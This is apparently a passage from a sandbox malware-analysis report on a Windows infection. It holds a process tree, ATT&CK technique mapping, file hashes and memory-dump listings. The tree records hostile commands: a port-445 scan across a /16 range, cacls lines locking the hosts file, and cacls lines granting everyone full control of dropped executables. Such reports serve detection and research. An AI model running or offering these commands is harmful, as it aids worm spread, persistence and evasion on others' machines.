  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 1060 C:\Windows\TEMP\cysgelbgy\1060.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 3756 C:\Windows\TEMP\cysgelbgy\3756.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2196
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 3844 C:\Windows\TEMP\cysgelbgy\3844.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:348
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 3904 C:\Windows\TEMP\cysgelbgy\3904.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2264
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 4004 C:\Windows\TEMP\cysgelbgy\4004.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4472
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 1800 C:\Windows\TEMP\cysgelbgy\1800.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 4496 C:\Windows\TEMP\cysgelbgy\4496.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 1104 C:\Windows\TEMP\cysgelbgy\1104.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 540 C:\Windows\TEMP\cysgelbgy\540.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 4232 C:\Windows\TEMP\cysgelbgy\4232.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 996 C:\Windows\TEMP\cysgelbgy\996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe
  C:\Windows\TEMP\cysgelbgy\wtumnnmbn.exe -accepteula -mp 5072 C:\Windows\TEMP\cysgelbgy\5072.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\cysgelbgy\gtirgeyld\scan.bat
  2⤵
  PID:2980
- - C:\Windows\cysgelbgy\gtirgeyld\nddeaesly.exe
    nddeaesly.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:3088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:5548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:5624

C:\Windows\SysWOW64\ewmksq.exe
C:\Windows\SysWOW64\ewmksq.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3448

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F
1⤵
PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3924
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F
  2⤵
  PID:3748

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F
1⤵
PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4480
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F
  2⤵
  PID:4920

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vbtnwbn.exe
1⤵
PID:3500
- C:\Windows\ime\vbtnwbn.exe
  C:\Windows\ime\vbtnwbn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1840

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\vbtnwbn.exe
1⤵
PID:5480
- C:\Windows\ime\vbtnwbn.exe
  C:\Windows\ime\vbtnwbn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5620

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F
1⤵
PID:5484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5596
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bwbylena\vbtnwbn.exe /p everyone:F
  2⤵
  PID:5612

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F
1⤵
PID:5496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5748
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ybidsenfa\ngefld.exe /p everyone:F
  2⤵
  PID:5648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\cysgelbgy\1060.dmp

Filesize
818KB

MD5
fe4ff8485288f27ce00b45bf934c66c2

SHA1
c3d1cde9e0e5c814a8588b1af93cf18b630c37fb

SHA256
31755c9b58584c27d086cda048e030897a8afd744124585a33484473c351cfd2

SHA512
6726afcb855a67716b97e34493af03cc1020389391ea67c91b203044cffccb2fb6594cb4d4b4d0b141b32a1de2c1de770fa51b8e2d45ee0ec12526c206deaa8a

Download Submit
C:\Windows\TEMP\cysgelbgy\1104.dmp

Filesize
8.5MB

MD5
bd16c882bce634ca816f51047f2101b2

SHA1
339280f21959b15b4724107fb48ddd1f0f6319f1

SHA256
b3e4fbae7dfe297521a1b012655269ee5a419750bc31ffa80a548a6cc0f0ca3b

SHA512
b47b0c1bfbbc8be8d512d3628d8741d9e7801ade9e835b3f2d7a1b3cc279ab518246c625eb6682403df98adb2deccb7fe8cfc57f0e4baf0f9cbc3ef9faf32b5a

Download Submit
C:\Windows\TEMP\cysgelbgy\1800.dmp

Filesize
26.2MB

MD5
b5a87c942b7a5a7b80179c80a9f007d8

SHA1
e49a410a68a5bfa82928f2931c0a63d55af41a6b

SHA256
6bba641cfb6c1c752e87407d3890bd9c23fa1708d2c43cc08c336ef334cc167a

SHA512
68d33b9b7e4046ddd38b064e612aab4263b2b20b5a843266f2875a2193173ae806a17e5ceb6fbb491a0e8553e66e2e9089135a101fc9a9d5a0aa7664ec68242a

Download Submit
C:\Windows\TEMP\cysgelbgy\2136.dmp

Filesize
4.1MB

MD5
460d3d90950014208e6a13952591dc2b

SHA1
bd8abb909c027ff9bbd53f3fd1a50d298df3307e

SHA256
904c583d2abdd323962a18317d194f12a5911cd09f36914cc4f3367861651a1c

SHA512
9320dca5bcc020dfa18d05387569298b1a872f1b0e0da0017543a097d8e15b27b598c58e349f2670540fcc0044e823b181c1347c8a672745e2f8f42f73e51da9

Download Submit
C:\Windows\TEMP\cysgelbgy\2648.dmp

Filesize
4.1MB

MD5
5b3afb73acccdaa720f1e002e9122b44

SHA1
ca222e867c21d00ee802342680d6616ac4fd7ed2

SHA256
3c4e0c1944e6554a1dd7a55edf66681aa3d31a00495dcf36c5f95b7a6d13749a

SHA512
fcf0c896f16124f0d54a9d68d41ace44bcbc0ceb2ed1f46b4c56363963c6ab73b55851ec7d54f9966ad3755f38da3ac36e6e0da6a61ffcf48ded1c0a42c2fbdc

Download Submit
C:\Windows\TEMP\cysgelbgy\2784.dmp

Filesize
2.9MB

MD5
8e2677a562e9f2d79959ca86faa66a9b

SHA1
fbb46b89cb8e99d325c43633c6dd0559492bcba5

SHA256
88b21a5cd51c2a66c5aef93db97c2e2e3bd13b3403103467e916afe71bd034f4

SHA512
fb505e71aba944eb745330c48962a79694ae7a87dec96427f77af55b1c2c49468e4a87d9de9d9afa8460a7a4a051d7a0b1fb738fb109853ecac7f215067a150a

Download Submit
C:\Windows\TEMP\cysgelbgy\2808.dmp

Filesize
7.4MB

MD5
b36bdeaede3b52a29b3b143f80c22174

SHA1
fce34d366ed83b276cde94b044673a0b854687a7

SHA256
2a648f8b590edef3d5f8f6c5f30a01965fa6ad5f51c3d98d430c320dd1658d77

SHA512
8de5a0b98a60a40406996b211e65b1d4c36c3e33f7e33d6ee86a71914bbf92ae190db4c770d3ea1af37915de05282147b6feea124bdc8a04a849b380d35b2b76

Download Submit
C:\Windows\TEMP\cysgelbgy\336.dmp

Filesize
33.4MB

MD5
932cd6f63d3ff109911df840f4e893a7

SHA1
16e1397723363cc92b996f9c7ad8362832506fba

SHA256
7ed428e991c369142bda80696347530232625f52df3782d8cdbfe9291b38fdfe

SHA512
885e77bbaf842a1988be862cc1f391b678370a3c12a2694ce5b3cfa39026a55898c6e4a3018cf7832d50b2dfad23859350c39fb08a23ff7e7d5ff35f56ccc358

Download Submit
C:\Windows\TEMP\cysgelbgy\3756.dmp

Filesize
2.4MB

MD5
75350ae7d44d1b3a3478cb4e83072c7d

SHA1
63e8c4688687704ccc315832ef88519524259cc6

SHA256
525a06ddb91826c0daf44317b2c337bdc6dfb56e7c8fbb6522d105657f050a94

SHA512
f118b7b607732d30d96a46a519ae428c8fe46af98a0aa445840a9e3887daa156cee98cf5209a64a24bf145cb601f653aea1d7fd10b0649276cd69f2d972eaf66

Download Submit
C:\Windows\TEMP\cysgelbgy\3844.dmp

Filesize
20.9MB

MD5
0a0b079af3d313cc9a43e641a16e4c84

SHA1
0915daa297a907cb473adb07a6e074de147f71ad

SHA256
9db95c10923c9dd5ac0161f2a66c741b08b46798297d38a891eb12f66e1d1996

SHA512
5f0ed4212cc6e0de1d6517cb3459918ec87f7a258ee8fa17c92bf3cf096d68c02fe3d4e75b5cb2451f5f9139f7f064ebfee52d3eb88fca7438bcff2b66249023

Download Submit
C:\Windows\TEMP\cysgelbgy\3904.dmp

Filesize
8.5MB

MD5
d7a17f64930afc9c17c16fc80a9156a6

SHA1
76bb23db1a0d92b61907d41e0fc9f15ed48c3735

SHA256
2f56aeeb63c703e07931011509c5d18c11e170fb877f63ac6415a581715de0c8

SHA512
efd215c950670ff2a187681c7381768b94678f61bf76856c26b640fd78402bf21929150f9772eb0f3222e7e0b79c4993178ceeaf7ad5ed8fa649c493038fea6d

Download Submit
C:\Windows\TEMP\cysgelbgy\4004.dmp

Filesize
44.2MB

MD5
d1689178861c05f536e4ee325d130e0b

SHA1
c18b35daa7f301a1b3045fe98c3dda5621c81141

SHA256
5afb2a01cc98d3cd34b335ccd8ef03d5d78e4202a4ccf33f8b2d7d81e3928058

SHA512
aea453c7ddd110dc6b80c97512216be088aee79c7cca702088588a8cc76a3293a64e1e0ea1146009cf2799b83b3b2d5ea0a9063ddcb93ddd73b20d96a34d2d98

Download Submit
C:\Windows\TEMP\cysgelbgy\4496.dmp

Filesize
1.2MB

MD5
4f1ef86ab6e7873504731e9ba30e9210

SHA1
2a6ddc76447a3af7699aafcf2be37db425f7cf38

SHA256
42b97df297270fd904dad86188bfb2efa9b8b5a46db740de54cd6c93c5ba19d8

SHA512
b9f666fabb2a189a71e3f33fd66d2e254becbb961b692b9d6526c7068d137b46cfbef0f44cdad2447d590206835c50803b9ac3fb271bc5ea8bc5e63dd88d36f3

Download Submit
C:\Windows\TEMP\cysgelbgy\784.dmp

Filesize
1.9MB

MD5
d1e24bd324ac939ecbae22c7f9cc1e83

SHA1
74ff12a39f099be7ba045dc05d99a5061f04618c

SHA256
ca69fb05236ef40f2cc991bd6ab742729a50ffbd0c1d20a5bea3d0a6552126af

SHA512
b30ce14ac83dc4d250a607b081037f32965407b6df8348c208b1f50430ed4e103c623350a1f6920d904035d5f8d88fc83a6659b3987938bf879b631b7f865c4b

Download Submit
C:\Windows\TEMP\ybidsenfa\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\cysgelbgy\wtumnnmbn.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsu8658.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsu8658.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\Temp\ybidsenfa\ngefld.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\bwbylena\vbtnwbn.exe

Filesize
7.8MB

MD5
6fe654c8fb450be52998ffec785655fc

SHA1
02f71162e892a430cef01f75903d7016ce010e3d

SHA256
4c377775d6b9953e4e923bc015ea664b21e5420293787893c2012a167a8ec96f

SHA512
b2ecb30a351412ee4e8fef73a2536efbc3956792e9d7e87a0dca36b2e03fcc9e7a992f6677a8eb2785fe0a5f74c597fef95e389ea8d243725e4196716d3c102c

Download Submit
C:\Windows\cysgelbgy\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\cysgelbgy\gtirgeyld\gwbrtisnb.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\cysgelbgy\gtirgeyld\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/348-206-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/1592-196-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/1696-179-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/1748-224-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/1804-171-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/2196-201-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/2264-210-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/2284-238-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/2300-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2444-228-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/2588-167-0x0000015BCDC70000-0x0000015BCDC80000-memory.dmp

Filesize
64KB

Download
memory/2588-293-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-198-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-186-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-254-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-204-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-287-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-239-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-234-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-222-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-251-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-216-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-290-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2588-164-0x00007FF65A530000-0x00007FF65A650000-memory.dmp

Filesize
1.1MB

Download
memory/2772-78-0x00000000013A0000-0x00000000013EC000-memory.dmp

Filesize
304KB

Download
memory/2984-168-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2984-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/3020-233-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/3088-249-0x0000000000790000-0x00000000007A2000-memory.dmp

Filesize
72KB

Download
memory/3208-231-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/3240-135-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp

Filesize
952KB

Download
memory/3240-138-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp

Filesize
952KB

Download
memory/3456-219-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/3924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4452-142-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/4452-146-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/4472-214-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/4564-192-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/4760-183-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/4980-188-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download
memory/5016-236-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp

Filesize
364KB

Download